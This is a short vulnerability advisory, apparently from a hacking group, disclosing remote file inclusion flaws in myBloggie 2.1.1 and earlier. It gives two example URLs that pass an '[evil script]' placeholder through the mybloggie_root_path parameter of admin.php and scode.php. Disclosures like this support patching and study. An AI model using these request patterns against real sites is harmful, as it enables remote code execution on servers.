myBloggie versions 2.1.1 and below suffer from remote file inclusion flaws.
d304cc51d8e9e7f7f316e32e33f3a10981de802148a5bb9c442b2b7ffdd96a52
# Milli-Harekat Advisory ( www.milli-harekat.org )
# MyBloggie <= 2.1.1 version - Remote File Include Vulnerabilities
# Risk : meduim
# Class: Remote
# Script : MyBloggie 2.1.1 version
# Msn : erne [at] ernealizm.com
# Credits : ERNE
# Thanks : Dj_ReMix,Eskobar,Blackened,TR_IP,ßy
KorsaN,OsL3m7,Poizonbox,Di_lejyoner and All MHG USERS
# Vulnerable :
http://www.site.com/blog/admin.php?mybloggie_root_path=[evil script]
http://www.site.com/blog/scode.php?mybloggie_root_path=[evil script]
_________________________________________________________________
Dont just search. Find. Check out the new MSN Search!
http://search.msn.click-url.com/go/onm00200636ave/direct/01/